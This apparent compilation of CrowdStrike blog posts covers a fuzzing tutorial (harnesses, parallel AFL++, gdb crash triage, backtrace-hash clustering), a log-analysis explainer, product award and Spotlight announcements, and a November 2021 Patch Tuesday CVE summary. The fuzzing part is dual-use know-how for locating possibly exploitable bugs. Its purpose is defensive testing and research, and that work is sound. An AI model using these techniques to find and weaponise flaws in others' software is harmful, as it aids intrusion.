Automatically generating inputs that trigger some kind of a bug in a reasonable amount of time is therefore one of the main challenges of fuzzing. On one hand, the number of inputs of a certain length is typically very large. On the other hand, testing all possible inputs is usually not necessary or even desirable, especially if the data must follow a certain format to actually reach relevant code paths. 

One simple example is a target that considers an input to be valid if and only if it starts with a hard-coded string, aka a magic string. Therefore, many fuzzing engines expect a small set of valid inputs and then start deriving new inputs with different mutation strategies (e.g., flipping bits, or adding and removing arbitrary data). For some engines, this mutation is driven by instrumenting the target to measure the execution path that a certain input has triggered. The general assumption is that a change in the input that triggers a new execution path is more likely to discover crashes than a change that exercises a code path that was previously observed.

During fuzzing, inputs that crash or hang the fuzzing target indicate that a bug was triggered. Such inputs (or samples) are collected for further analysis. Provided the target behaves deterministically, any input can be easily passed to the target again to try to reproduce the result observed during fuzzing.

It is common for a fuzzing run to generate many samples that trigger the same bug in the target. For example, an input of 160 characters might trigger the same buffer overflow in the target as an input with 162 characters. To be able to handle the many potential samples generated during a fuzzing run and not have to analyze each individually, good tooling is crucial to triage them. While some targets require custom tooling, we found several strategies to be generally applicable, and we will introduce a few of them next.



Modern fuzzing approaches mutate those inputs that have shown particular promise of leading to new behavior. For example, coverage-guided fuzzing engines preferentially mutate those inputs that lead to undiscovered execution paths within the target. To be able to detect new execution paths, the fuzzing engine tries to measure the code coverage of a specific execution run. To do so, instrumentation is usually compiled into the target. 

The fuzzing tools usually provide their own compilation toolchains as a wrapper around common compilers (e.g., gcc or clang) to inject instrumentation at compile time. It should be noted that some fuzzing engines are also capable of fuzzing non-instrumented binaries — one popular method for fuzzing closed-source binaries is to use QEMU’s dynamic binary translation to transparently instrument them without recompilation. For the rest of this blog post, though, we’ll assume that we have access to the source code of a software and are allowed and able to modify and compile it.

Hunting for security vulnerabilities is important for estimating potential risks and exploitability of a software. However, only some types of vulnerabilities can be covered by a generic fuzzing engine. While a null pointer dereference would normally result in a crash of the fuzzing target and thus a report from the fuzzing engine, a logic flaw where a function returns a type-correct but wrong result is likely to go undetected. 

AFL++ and Honggfuzz, for example, report those inputs where the execution of the fuzzing target was terminated with a signal (e.g., SIGSEGV or SIGABRT). A generic fuzzing engine has no information whether a function such as int isdigit(int c) was correct when 1 is returned for a given character c. In addition, not every memory issue leads to a crash. Except access violations, an out-of-bound read operation might not be detected at all, and an out-of-bound write operation may cause the fuzzing target to crash if and only if the data that was overwritten is subsequently used in some way (e.g., a return address on the stack or an allocated heap memory segment).

There are two general solutions to address these issues. For one, Address Sanitizer (ASan) can be used to find and report memory errors that would not normally cause a program to crash. ASan, if specified via the environment setting ASAN_OPTIONS=”abort_on_error=1”, terminates a program with signal SIGABRT if an error is detected. In addition, small function wrappers can be implemented to introduce application-specific checks or other optimizations, as shown next.

The Harness

Fuzzing a library or a program typically requires researchers to write a bit of wrapper code that implements an entry point for the fuzzer, potentially executes some setup code, and passes the fuzzing input to the function that is to be fuzzed. This wrapper code is typically called a harness. In addition to passing along the fuzzer input, a harness can also provide several other features.

First, a harness can normalize the input from the fuzzer to the target. Especially when targeting a function, wrapping it into an executable that presents a standardized interface to the fuzzing engine is necessary. This type of wrapper sometimes needs to do more than simply passing the input to the target function, because fuzzing engines in general would not be aware of any requirements or format that the target expects. For example, when targeting a function such as

int some_api(char *data, size_t data_length);

which expects a string and the length of this string as arguments, a wrapper such as the following can be used to make sure that the data generated by the fuzzing engine is passed to the function in the proper format:

int fuzz_some_api(char *fuzz_data)
        return some_api(fuzz_data, strlen(fuzz_data));

Other types of wrappers can aid the fuzzer by ignoring certain inputs that are known to cause false positives, for example because the target detects them as erroneous and reacts with a (not security-relevant) crash. 

For example, having a target function char *encode(char *data) that is known to safely crash if the input string contains certain characters, a wrapper such as the following could be used to avoid such false positive reports:

char *fuzz_encode(char *fuzz_data)
        for (char *ptr = fuzz_data; *ptr != NULL; ptr++)
            if (!fuzz_is_allowed_character(*ptr))
                return NULL;

        return encode(fuzz_data);

Conversely, a wrapper can also be used to detect and signal unexpected behavior, even if the fuzzing target does not crash. For example, given two functions

  1. char *encode(char *data);
  2. char *decode(char *data);

(where decode() is expected to implement the reverse function of encode(), and vice versa) a wrapper function can ensure that for any generated input, the string returned by decode(encode(fuzz_data)) is equal to the input fuzz_data. The wrapper function, and entry point for the fuzzer, might implement a routine as follows:

void fuzz_functions(char *fuzz_data)
        if (strcmp(decode(encode(fuzz_data)), fuzz_data) != 0)
            trigger_crash(); // force a crash, e.g. via *((int *) 0) = -1;

In summary, wrapping the fuzzing target can often reduce the number of false positives by a considerable amount. When implementing wrappers, we found it to be very useful to integrate the wrapping code into the original codebase using #ifdef statements as shown below:

int main(int argc, char **argv)
    #ifdef FUZZING
        return func(get_fuzz_data());
        // original codebase:
        data = get_data_via_options(argc, argv);
        return func(data);

Utilizing All Cores

Since fuzzing is resource-intensive, it would be ideal to utilize all processor cores that are available in a modern multi-core system. While Honggfuzz is a multi-process and multi-threaded fuzzing engine out of the box, AFL++ needs manual setup to do so.

To fuzz in parallel using AFL++, the fuzzing is started with one “master instance” (flagged with -M), and all other instances will be created as “secondary instances” (flagged with -S). The following excerpt is part of a script that can be used to spawn multiple instances of afl-fuzz, each one inside a screen session to be able to log out of the fuzzing host without interrupting the instances:

for i in $(seq -w 1 ${NUM_PROCS}); do
        if [ "$i" -eq "1" ]; then
            PARAM="-M fuzzer${i}"
            PARAM="-S fuzzer${i}"

        CMD='afl-fuzz -i ${DIR_IN} -o ${DIR_OUT} ${PARAM} "${BINARY}"'

        echo "[+] starting fuzzing instance ${i} (parameter ${PARAM})..."
        screen -dmS "fuzzer-${i}" ${CMD}

Crash Triage

After running for a while, the fuzzer will ideally have generated a number of inputs (samples) that crashed the target during fuzzing. We now aim to automatically aggregate this set of samples and enrich each sample and the corresponding potential crash with information to drive any further analysis. 

One of our strategies is to group (cluster) the samples with respect to the behavior of the fuzzing target during execution. Since the resulting clusters then represent different behavior of the fuzzing target, they are easier to triage for (exploitable) bugs. This clustering strategy requires information about the crash and the code path that led to it, which can be collected automatically, using debuggers, for example.

Other information that can be automatically collected is whether a crash is deterministically reproducible, and whether the build configuration (affecting, for example, function addresses or variable order) or the runtime environment (e.g., environment variables or network properties) have an impact on whether the target crashes on a particular sample. 

Given a sample from the fuzzing run, we can replay that input against the target compiled with different configurations (e.g., both with and without the fuzzer’s instrumentation, with different build-time options, or with and without ASan) and see whether the executions crash. The idea is to have different binaries with different configurations to capture circumstances of a crash with respect to a sample that was generated during a fuzzing run. 

For example, if only the instrumented version crashes, then the bug is potentially in the fuzzing-specific code and therefore a false positive. Another example is a sample generated by a fuzzing run on a target with ASan support, where a crash cannot be reproduced with a non-ASan version. In this case, there might be a bug that does not crash the target but could potentially be used to engineer an exploit (e.g., out-of-bound read access to leak sensitive information). 

Collecting all of this information will help us better understand why the samples collected by the fuzzer crash the target, under which circumstances, and whether they may have triggered an exploitable bug. Good strategies and tooling are essential to reduce the required amount of manual analysis.

Sample Collection

Since the different fuzzing engines save samples in different ways, another simple but necessary post-processing step to implement is sample collection. AFL++ and Honggfuzz default to storing each sample in its own file and using the filename to save information about the termination signal, the program counter, a stack signature, and the address and disassembled instruction at which the fault occurred. 

Unfortunately, both fuzzers use a different format out of the box, so the first step in our post-processing pipeline is to collect and move all samples to a shared folder, extract and store information from the filenames, and then rename them to a standard format. Renaming samples to a hash of their contents has worked well for us, because it allows a quick and easy merging of samples from different fuzzing runs.

Information Collection Using GDB

For each sample, we automatically collect information as already indicated. One of the building blocks is an analysis module that uses gdb to collect various information about the crash of a target on a given sample. For the sake of simplicity, we’ll assume that the target expects data either from STDIN or as a command line argument and is unaffected by other vectors that could affect the execution of a binary (e.g., network, environment variables, file system properties). The module invokes gdb as follows:

/usr/bin/gdb -q -nx $binary

The -nx flag is used to avoid loading a gdbinit file, while the -q flag is used to stop gdb printing its version string. After invoking gdb, the following gdb commands are executed automatically:

(gdb) set width unlimited
    (gdb) run {run_payload}
    (gdb) backtrace -frame-info short-location

The first command prevents gdb from breaking long lines, e.g., when printing backtraces. The second command executes the fuzzing target, feeding it either the path to the sample or the actual sample content. The third command generates the backtrace. If the execution of the binary finishes without a crash, or times out, the evaluation is stopped and no backtrace is generated.

The backtrace in general is a summary of the program’s path to the current point in execution. It consists of stack frames, where each stack frame relates to one nested function call. For example, having a function f() that calls the function g(), and the function g() calls a function h(), and a backtrace is generated inside h(), that backtrace might look as follows:

In summary, by executing the binary once on each sample, gdb will tell us whether the binary crashed at all, and if it did, gdb will yield the signal that terminated the process, as well as a backtrace. The backtrace will provide the names of invoked functions, their addresses, variable states and additional debugging information. The output for an exemplary sample looks as follows:

This information is then parsed, stored in a database and subsequently used to cluster all of the samples in order to reduce the overhead of identifying interesting bugs.


After gathering information about all of our samples and adding them to a database, the next step is to try and sort the samples into clusters. Obviously, there are many possible approaches to do that. One method that works very well for us, while being exceedingly simple, is based on hashing the list of addresses of the backtrace. The following source code excerpt shows this approach:

def compute_clusterhash(backtrace):
        bt_addresses = [frame["addr"] for frame in backtrace]
        return hashlib.md5('.'.join(bt_addresses).encode()).hexdigest()

For each sample, there is an entry in a database that looks as follows:

        "sample": "e5f3438438270583ff09cd84790ee46e",
        "crash": true,
        "signal": "SIGSEGV",
        "signal_description": "Segmentation fault",
        "backtrace": [
                "addr": "0x00007ffff7f09592",
                "func": "__memmove_avx_unaligned_erms", [...]
                "addr": "0x00007ffff7fb3524",
                "func": "ReadFromRFBServer", [...]
                "addr": "0x00007ffff7fae7da",
                "func": "HandleTRLE24", [...]
                "addr": "0x00007ffff7f9c9ba",
                "func": "HandleRFBServerMessage", [...]
                "addr": "0x0000555555555762",
                "func": "spin_fuzzing", [...]
                "addr": "0x00005555555558e5",
                "func": "main", [...]

This information is now transformed into a hash using compute_clusterhash(), as shown below:

>>> compute_clusterhash(example["backtrace"])

We can now cluster our samples by these hashes, hoping samples that trigger different bugs yield different hashes, and samples that trigger the same bug yield the same hash. The next step would be to examine the different clusters to better understand the underlying bugs and learn how to trigger and potentially exploit them. In the best case, just one or only very few samples from each cluster would need to be reviewed.

In our experience, deriving clusters based on the backtrace — generated at the point where the crash occurs — is more useful than considering the full execution path that led to the crash, because usually software is complex enough that there are often different execution paths leading to the same position in code. However, if the analysis reveals that the same bug is reached through different backtraces for a certain target, the described method could be changed to trim the backtrace to only a number of most recent frames during clustering under the assumption that code closer to the crash is more relevant than code that was executed earlier in the program.


Fuzzing is a well-established technique for discovering new vulnerabilities in software. With this blog, we hope to give you an overview of what is required to successfully fuzz a target, from implementing a harness, to gathering crash information, to using this information for clustering inputs and corresponding crashes for further analysis.

Additional Resources

✇ CrowdStrike

Everything You Need To Know About Log Analysis

By: Humio Staff

This blog was originally published Sept. 30, 2021 on humio.com. Humio is a CrowdStrike Company.

What Is Log Analysis?

Log analysis is the process of reviewing computer-generated event logs to proactively identify bugs, security threats, factors affecting system or application performance, or other risks. Log analysis can also be used more broadly to ensure compliance with regulations or review user behavior.

A log is a comprehensive file that captures activity within the operating system, software applications or devices. Logs automatically document any information designated by the system administrators, including: messages, error reports, file requests, file transfers and sign-in/out requests. The activity is also time-stamped, which helps IT professionals and developers establish an audit trail in the event of a system failure, breach or other outlying event.

Why Is Log Analysis Important?

In some cases, log analysis is critical for compliance since organizations must adhere to specific regulations that dictate how data is archived and analyzed. It can also help predict the useful lifespan of hardware and software. In addition, log analysis can help IT teams amplify four key factors that help deliver greater business value and customer-centric solutions: agility, efficiency, resilience and customer value.

Log analysis can unlock many additional benefits for the business. These include:

  • Improved troubleshooting. Organizations that regularly review and analyze logs are typically able to identify errors more quickly. With an advanced log analysis tool, the business may even be able to pinpoint problems before they occur, which greatly reduces the time and cost of remediation. Logs also help the log analyzer review the events leading up to the error, which may make the issue easier to troubleshoot and prevent in the future.
  • Enhanced cybersecurity. Effective log analysis dramatically strengthens the organization’s cybersecurity capabilities. Regular review and analysis of logs helps organizations more quickly detect anomalies, contain threats and prioritize responses.
  • Improved customer experience. Log analysis helps businesses ensure that all customer-facing applications and tools are fully operational and secure. The consistent and proactive review of log events helps the organization quickly identify disruptions or even prevent such issues — improving satisfaction and reducing turnover.
  • Agility. Organizations can predict the useful life span of hardware and software and help businesses prepare for scale and agility, thus providing a competitive edge in the marketplace.

How Is Log Analysis Performed?

Log analysis is typically done within a log management system, a software solution that gathers, sorts and stores log data and event logs from a variety of sources.

Log management platforms allow the IT team and security professionals to establish a single point from which to access all relevant endpoint, network and application data. Typically, logs are searchable, which means the log analyzer can easily access the data they need to make decisions about network health, resource allocation or security. Traditional log management uses indexing, which can slow down search and analysis. Modern log management uses index-free search; it’s less expensive, faster and can create gains of 50-100x in required disk space.

Log analysis typically includes:

Ingestion: Installing a log collector to gather data from a variety of sources, including the OS, applications, servers, hosts and each endpoint, across the network infrastructure.

Centralization: Aggregating all log data in a single location as well as a standardized format regardless of the log source. This helps simplify the analysis process and increase the speed at which data can be applied throughout the business.

Search and analysis: Leveraging a combination of AI/ML-enabled log analytics and human resources to review and analyze known errors, suspicious activity or other anomalies within the system. Given the vast amount of data available within the log, it is important to automate as much of the log analysis process as possible. It is also recommended to create a graphical representation of data, through knowledge graphing or other techniques, to help the IT team visualize each log entry, its timing and interrelations.

Monitoring and alerts: The log management system should leverage advanced log analytics to continuously monitor the log for any log event that requires attention or human intervention. The system can be programmed to automatically issue alerts when certain events take place or certain conditions are or are not met.

Reporting: Finally, the LMS should provide a streamlined report of all events as well as an intuitive interface that the log analyzer can leverage to get additional information from the log.

The Limitations of Indexing

Many log management software solutions rely on indexing to organize the log. While this was considered an effective solution in the past, indexing can be a very computationally-expensive activity, causing latency between data entering a system and then being included in search results and visualizations. As the speed at which data is produced and consumed increases, this is a limitation that could have devastating consequences for organizations that need real-time insight into system performance and events.

Further, with index-based solutions, search patterns are also defined based on what was indexed. This is another critical limitation, particularly when an investigation is needed and the available data can’t be searched because it wasn’t properly indexed.

Leading solutions offering free-text search, which allows the IT team to search any field in any log. This capability helps to improve the speed at which the team can work without compromising performance. Learn more.

Log Analysis Methods

Given the massive amount of data being created in today’s digital world, it has become impossible for IT professionals to manually manage and analyze logs across a sprawling tech environment. As such, they require an advanced log management system and techniques that automate key aspects of the data collection, formatting and analysis processes.

These techniques include:

  • Normalization. Normalization is a data management technique that ensures all data and attributes, such as IP addresses and timestamps, within the transaction log are formatted in a consistent way.
  • Pattern recognition. Pattern recognition refers to filtering events based on a pattern book in order to separate routine events from anomalies.
  • Classification and tagging. Classification and tagging is the process of tagging events with key words and classifying them by group so that similar or related events can be reviewed together.
  • Correlation analysis. Correlation analysis is a technique that gathers log data from several different sources and reviews the information as a whole using log analytics.
  • Artificial ignorance. Artificial ignorance refers to the active disregard for entries that are not material to system health or performance.

Log Analysis Use Case Examples

Effective log analysis has use cases across the enterprise. Some of the most useful applications include:

  • Development and DevOps. Log analysis tools and log analysis software are invaluable to DevOps teams, as they require comprehensive observability to see and address problems across the infrastructure. Further, because developers are creating code for increasingly-complex environments, they need to understand how code impacts the production environment after deployment. An advanced log analysis tool will help developers and DevOps organizations easily aggregate data from any source to gain instant visibility into their entire system. This allows the team to identify and address concerns, as well as seek deeper information.
  • Security, SecOps and Compliance. Log analysis increases visibility, which grants cybersecurity, SecOps and compliance teams continuous insights needed for immediate actions and data-driven responses. This in turn helps strengthen the performance across systems, prevent infrastructure breakdowns, protect against attacks and ensure compliance with complex regulations. Advanced technology also allows the cybersecurity team to automate much of the log file analysis process and set up detailed alerts based on suspicious activity, thresholds or logging rules. This allows the organization to allocate limited resources more effectively and enable human threat hunters to remain hyper-focused on critical activity.
  • Information Technology and ITOps. Visibility is also important to IT and ITOps teams as they require a comprehensive view across the enterprise in order to identify and address concerns or vulnerabilities. For example, one of the most common use cases for log analysis is in troubleshooting application errors or system failures. An effective log analysis tool allows the IT team to access large amounts of data to proactively identify performance issues and prevent interruptions.

Log Analysis Solutions From Humio

Humio is purpose-built to help any organization achieve the benefits of large-scale logging and analysis. The Humio difference:

  • Virtually no latency regardless of ingestion, even in the case of data bursts
  • Index-free logging that enables full search of any log, including metrics, traces and any other kind of data
  • Real-time data streaming and streaming analytics with an in-memory state machine
  • Ability to join datasets and create a joint query that searches multiple data sets for enriched insights
  • Easily configured, sharable dashboards and alerts power live system visibility across the organization
  • High data compression to reduce hardware costs and create more storage capacity, enabling both more detailed analysis and traceability over longer time periods

Additional Resources

✇ CrowdStrike

CrowdStrike Falcon’s Autonomous Detection and Prevention Wins Best EDR Award and Earns Another AAA Rating in SE Labs Evaluations

By: Liviu Arsene - Joe Faulhaber
  • CrowdStrike wins the prestigious SE Labs “Best Endpoint Detection and Response” 2021 award. 
  • This marks CrowdStrike’s second consecutive year winning Best EDR from SE Labs, the highly regarded independent testing organization, based on stellar EDR performance and testing results observed over the past 12 months.
  • Earlier this week, CrowdStrike  once again earned the highest AAA rating in the SE Labs Enterprise Endpoint Protection, Q3 2021 report, achieving detection scores of 99% total accuracy and 100% legitimate accuracy.
  • This is the 12th AAA rating in EPP for the CrowdStrike Falcon® platform, dating back to March 2018.

CrowdStrike Falcon has been named best Endpoint Detection and Response, winning the award for the second time since independent third-party testing organization SE Labs first introduced it in 2020. The achievement speaks directly to Falcon’s outstanding automated detection and prevention capabilities in tracking elements of sophisticated attack chains and protecting customers from breaches.

CrowdStrike also received a new AAA rating from SE Labs in its recent Endpoint Protection report, demonstrating consistent achievements in SE Labs testing in terms of automated protection and remediation capabilities using on-sensor indicators of attack (IOAs) and machine learning. This latest achievement underscores our commitment to transparency and constant improvement of our capabilities. 

The Falcon platform achieved a 99% Total Accuracy rating in protecting against both in-the-wild commodity threats and targeted attacks, according to the recent Q3 SE Labs Enterprise Endpoint Protection report. In this evaluation, CrowdStrike, a next-generation cloud endpoint detection and response (EDR) vendor, outperformed legacy vendors such as Microsoft, Symantec and McAfee. Falcon achieved outstanding testing score results, with CrowdStrike placing in the top three vendors in overall final score, with nearly in a tie for the best three solutions tested.  

Regularly participating in independent third-party tests drives us to build relevant, meaningful and valuable capabilities that can protect against sophisticated adversaries and threats as well as commodity malware. 

Falcon Once Again Wins Highest AAA Ranking from SE Labs

In the latest report, CrowdStrike Falcon was awarded the highest AAA rating, speaking to Falcon’s capability of automated detection and protection against sophisticated adversaries and unrelenting effectiveness in neutralizing and blocking threats.

SE Labs testing aims to offer a complete view of the capabilities of endpoint security solutions by using common attack tools typical of early stages of attempted breaches and in-the-wild commodity malware that is representative of the current threat landscape. CrowdStrike Falcon has consistently participated in SE Labs testing, with an excellent track record of AAA ratings in SE Labs Enterprise Endpoint Protection reports dating back to March 2018. This marks the 12th time Falcon has been awarded an impressive AAA rating in Enterprise Endpoint Protection evaluations from SE Labs and the third time in 2021. 

Testing scenarios for detection and protection from general threats involved the ability to accurately identify web-based threats, such as URLs that attackers commonly use to trick users into downloading threats or executing malicious scripts. Identifying and blocking exploits and accurately identifying legitimate applications are also part of the testing scenario, with CrowdStrike Falcon achieving an AAA award with 99% Total Accuracy and 100% Legitimate Accuracy rating. False positives generated by incorrectly identifying legitimate applications and websites as malicious can create serious disruptions in business operations. A 100% legitimate accuracy rating means businesses will spend less time, effort and money on remediating false positives and bringing systems back into production. 

Testing every layer of detection and protection against typical stages of an attack employed by sophisticated adversaries measures how the security solution responds to each stage of the attack. CrowdStrike Falcon achieved a 99 Protection Score, which reflects the overall level of protection across multiple attack stages. This SE Labs score assesses the ability to protect systems by detecting, blocking or neutralizing threats based on how severe the outcomes of an attack could be. 

Products that detect and neutralize threats during the early stages of an attack are rated better and will protect systems from sophisticated threats. Conversely, the test severely penalizes security software that blocks legitimate applications, creating false positives. Blocking threats early in the attack chain enabled CrowdStrike Falcon to achieve excellent results in automatically detecting and protecting against incidents.

CrowdStrike Falcon Testing Achievements

By repeatedly participating in independent third-party cybersecurity testing, CrowdStrike demonstrates transparency in Falcon capabilities, and public results serve as a track record for validating consistency in automated protection and remediation. Since there is no single independent third-party test to determine an industry leader, Falcon’s capabilities are validated by our ongoing participation in tests and evaluations from leading organizations, and by obtaining verifiable and repeatable detection and protection results. 

Falcon has demonstrated a superior track record for participating and excelling in third-party independent tests, with consistent results in terms of automated protection and remediation capabilities. For example, CrowdStrike was named a strategic leader in AV-Comparatives Endpoint Protection and Response tests and a leader in the Gartner Magic Quadrant for Endpoint Protection Platforms (EPP). With awards and certifications from leading testing organizations including AV-Comparatives, SE Labs and MITRE, CrowdStrike remains fully committed to supporting independent third-party efforts.

While these are only a handful of achievements, CrowdStrike has never been more unwavering and committed to our mission to stop breaches.

Additional Resources

✇ CrowdStrike

Falcon Spotlight ExPRT.AI Aids Federal Agencies in Meeting CISA Mandate

By: Alyssa Ideboen

The Cybersecurity and Infrastructure Security Agency (CISA) issued a mandate on November 2, 2021, for all U.S. federal agencies to fix hundreds of known vulnerabilities. Binding Operational Directive 22-01 (BOD 22-01) compels all federal departments and agencies to specifically address the vulnerabilities in the published catalog to protect and safeguard valuable federal data and information systems. The order will require all agencies to have patches in place for all vulnerabilities published prior to 2021 within six months, and all vulnerabilities from 2021 and beyond within two weeks of the issuance date. 

The U.S. Department of Homeland Security and CISA will oversee the implementation of this mandate. As stated in the directive, “It is essential to aggressively remediate known exploited vulnerabilities to protect federal information systems and reduce cyber incidents.” The catalog of vulnerabilities contains many of the most highly exploited and most significant severity vulnerabilities that are known, making this list an important and essential tool for review and remediation within any organization covered in the directive. 

While this directive is required only for federal agencies, CISA strongly recommends that all state and local government as well as private organizations review and monitor the provided vulnerability catalog and implement remediation procedures in the time frame specified in the directive to strengthen their overall security posture. 

As a result of this mandate, CrowdStrike has added this catalog of vulnerabilities to Falcon Spotlight™ ExPRT.AI as a new source of exploited vulnerability data. With Falcon Spotlight, government agencies and enterprises alike are able to quickly identify and prioritize vulnerabilities that pose the most risk for their organization. 

Why Issue BOD 22-01?

This is the first time CISA has issued a government-wide mandate for federal agencies to remediate vulnerabilities. CISA Director Jen Easterly stated that CISA is using its authority to help enforce and encourage federal cybersecurity efforts to protect from potential malicious actors. She goes on to say, “The Directive lays out clear requirements for federal civilian agencies to take immediate action to improve their vulnerability management practices and dramatically reduce their exposure to cyber-attacks.” Because this catalog contains already known exploited vulnerabilities and due to the sensitive or valuable nature of government systems and data, this mandate is timely to help ensure the protection and defense of the U.S. infrastructure. 

Falcon Spotlight’s ExPRT.AI Helps Enable IT Staff to Meet CISA Requirements

SecOps staff for both government agencies and organizations are often pressed for time. With the plethora of critical and highly scored vulnerabilities, a common issue arises where not all highly scored vulnerabilities are addressed in a timely manner. This leaves organizations with gaps or flaws within their systems — and threat actors use those holes to exploit organizations for nefarious gain. Historically, SecOps has relied on vendors to provide some prioritization information around this large body of vulnerabilities — but that is not enough. With the limited amount of time typically allocated for patching and updating systems, critical vulnerabilities are not being remediated, and that could be potentially very damaging.

Falcon Spotlight goes beyond identification of these vulnerabilities and prioritizes them  in a new and extremely useful way. This method utilizes the recently announced ExPRT.AI — a dynamic model that capitalizes on a wide variety of vulnerability and threat-based telemetry, including CrowdStrike’s threat intelligence — as well as CISA’s Known Exploited Vulnerabilities Catalog to provide a more intuitive, relevant score or rating that enables staff to target those vulnerabilities that would have the most detrimental impact within an organization. 

How Does Falcon Spotlight’s ExPRT.AI Work? 

Falcon Spotlight’s ExPRT.AI is based on two important factors: the data that the algorithm model relies on and the structure and dynamism of the model itself. Let’s explore how this works.

The ExPRT.AI model is constantly adapting. It takes data from an impressive database of threat and exploit intelligence from a large variety of sources, and then uses both historical and new data (such as the CISA catalog) to create an output, the ExPRT Rating, which provides a more accurate and transparent rating than what SecOps staff have traditionally been forced to rely on. Since the model is always adapting, it provides a dynamic ExPRT rating — one that changes as new data comes in. When new threats or exploits are discovered, the rating for the vulnerability changes to reflect whether it should be ranked more or less severely based on the inputs. 

While other vendors may claim to have a dynamic rating system, only CrowdStrike’s vast library of telemetry can provide such an operationally useful solution as ExPRT.AI, giving SecOps staff greater efficiency and a higher degree of visibility to immediately remediate or patch the vulnerabilities that adversaries are most likely to target, specific to their organization. To see how Falcon Spotlight ExPRT.AI works in action, check out this demo.

Additional Resources

  • Try Falcon Spotlight™ to help discover and manage vulnerabilities in your environments. 
  • See how CrowdStrike Falcon Complete™ managed detection and response (MDR) stops Microsoft exchange server zero-day exploits.
  • Make prioritization painless and efficient. Watch how Falcon Spotlight enables IT staff to improve visibility with custom filters and team dashboards
  • Read about critical vulnerabilities your organization should prioritize in our monthly Patch Tuesday blog series — read November’s installment.  
  • Test CrowdStrike next-gen AV for yourself. Start your free trial of Falcon Prevent™ today.
✇ CrowdStrike

November 2021 Patch Tuesday: Two Active Zero-Days and Four Publicly Disclosed CVEs

By: Falcon Spotlight Team

As the year draws to a close, the active exploitation of Microsoft vulnerabilities continues unabated. Once again, a broad range of Microsoft products are included in this month’s Patch Tuesday update as the aging Microsoft ship is springing security leaks everywhere.

Two vulnerabilities, CVE-2021-42292 and CVE-2021-42321, have seen in-the-wild exploitation, and four other vulnerabilities were publicly disclosed before Microsoft issued updates, giving threat actors the opportunity to take advantage of them before patches were released. 

Given the sheer volume of vulnerabilities in Microsoft products, organizations need to prioritize which vulnerabilities to patch first so they can allocate resources. Severity ratings and scores, while an important indicator of a vulnerability’s impact, are not the only measure that SecOps staff should consider in this process. The context and threat intelligence surrounding a particular CVE may indicate a more pressing need to prioritize and mitigate one vulnerability over another. Regular patching cycles and prompt updating are of critical importance for maintaining a strong and defensible security posture. 

For assistance on how to determine which vulnerabilities truly affect your organization, see Falcon Spotlight’s ExPRT.AI dynamic model and intelligent rating. 

New Patches for 55 Vulnerabilities

November 2021 Patch Tuesday covers fixes for 55 vulnerabilities, with the most common attack types again being remote code execution and elevation of privilege. Microsoft has offered patches for multiple zero-day vulnerabilities surrounding Microsoft Exchange products this year (see March’s Patch Tuesday release), CVE-2021-42321 is a Remote Code Execution vulnerability but requires some authentication and hence won’t see that wide active exploitation. CVE-2021-42292, however, impacts Microsoft Excel products, a widely used application for many organizations — and since this method of attack (security feature bypass) has seen success, this CVE is another one to prioritize in your organization’s patching process. 

As with previous months, Windows is a common product to receive patches, and this month includes Extended Security Updates (ESU) and Azure.

Figure 1. Breakdown of November 2021 Patch Tuesday attack impact

Figure 2. Patches by Product Family

More on Active Exploitation for Microsoft Exchange and Microsoft Excel Products

The two zero-day vulnerabilities reported by Microsoft as being exploited in the wild, one affecting Exchange Server and the other impacting Excel, are common access points for attackers to infiltrate an organization. 

CVE-2021-42321 is a post-authentication remote code execution vulnerability affecting on-premises Microsoft Exchange Server Exchange 2016 and 2019, including those used by customers in Exchange Hybrid mode. Microsoft has a CVSS of 8.8 for this vulnerability. This vulnerability was successfully exploited during the Tianfu Cup 2021 hacker contest (the Chinese version of Pwn2Own). 

CVE-2021-42292 is an actively exploited Microsoft Excel vulnerability utilizing security feature bypass. Adversaries are able to install malicious code by tricking users into opening a “booby-trapped” Excel file. Updates are available for Windows, but as of this writing, an update has not been released for the Mac version.

Rank CVSS Score CVE Description
Critical 8.8  CVE-2021-42321 Microsoft Exchange Server Remote Code Execution Vulnerability
Critical 7.8 CVE-2021-42292  Microsoft Excel Security Feature Bypass Vulnerability

Publicly Disclosed Vulnerabilities by Microsoft

Four of the vulnerabilities patched by Microsoft this month were publicly disclosed before Microsoft released security updates. Two affect 3D Viewer and can be exploited to gain remote code execution. The other two are related to Windows Remote Desktop Protocol (RDP) which can lead to information disclosures.

CVE-2021-43208 and CVE-2021-43209 is a 3D Viewer Remote Code Execution vulnerability. These vulnerabilities are publicly disclosed — ZDI published details in June and July 2021. Patches were rolled out from Microsoft Store and customers don’t need to install any KB.

CVE-2021-38631 and CVE-2021-41371 is a Windows Remote Desktop Protocol (RDP) information disclosure vulnerability. The attacker on successfully exploiting this vulnerability  could obtain read access to Windows RDP client passwords set by RDP server administrators.

Rank CVSS Score CVE Description
Important 4.4 CVE-2021-38631 Windows Remote Desktop Protocol (RDP) Information Disclosure Vulnerability
Important 4.4 CVE-2021-41371 Windows Remote Desktop Protocol (RDP) Information Disclosure Vulnerability
Important 7.8 CVE-2021-43208 3D Viewer Remote Code Execution Vulnerability
Important 7.8 CVE-2021-43209 3D Viewer Remote Code Execution Vulnerability

Other Critical Vulnerabilities to Prioritize

CVE-2021-26443, a Microsoft Virtual Machine Bus (VMBus) Remote Code Execution vulnerability, occurs when a VM guest fails to properly handle communication on a VMBus channel. To exploit the vulnerability, an authenticated attacker could send a specially crafted communication on the VMBus channel from the guest VM to the host. An attacker that successfully exploits the vulnerability could execute arbitrary code on the host operating system.

CVE-2021-42279, Chakra Scripting Engine Memory Corruption vulnerability, has been given a base score of 4.2 by Microsoft, but it is ranked Critical. It affects almost all versions of Windows 10 and allows an attacker to remotely execute malicious code on the affected system.

CVE-2021-42298, a Microsoft Defender Remote Code Execution vulnerability, can lead to  malicious remote code execution. Windows Defender uses the Microsoft Malware Protection Engine (mpengine.dll), which provides scanning, detection and cleaning capabilities for Microsoft antivirus and antispyware software. The patch for this vulnerability is automatically downloaded and installed only if the host is set for automatic updating.

Rank CVSS Score CVE Description
Critical  9.0 CVE-2021-26443 Microsoft Virtual Machine Bus (VMBus) Remote Code Execution Vulnerability
Critical  9.8 CVE-2021-3711 OpenSSL: CVE-2021-3711 SM2 Decryption Buffer Overflow
Critical  8.8 CVE-2021-38666 Remote Desktop Client Remote Code Execution Vulnerability
Critical  4.2 CVE-2021-42279 Chakra Scripting Engine Memory Corruption Vulnerability
Critical  7.8 CVE-2021-42298 Microsoft Defender Remote Code Execution Vulnerability
Critical  8.7 CVE-2021-42316 Microsoft Dynamics 365 (on-premises) Remote Code Execution Vulnerability
Critical 7.8 CVE-2021-42298 Microsoft Defender Remote Code Execution Vulnerability

When Priorities Conflict Due to Broad Product Updates Consider Your Prioritization Process

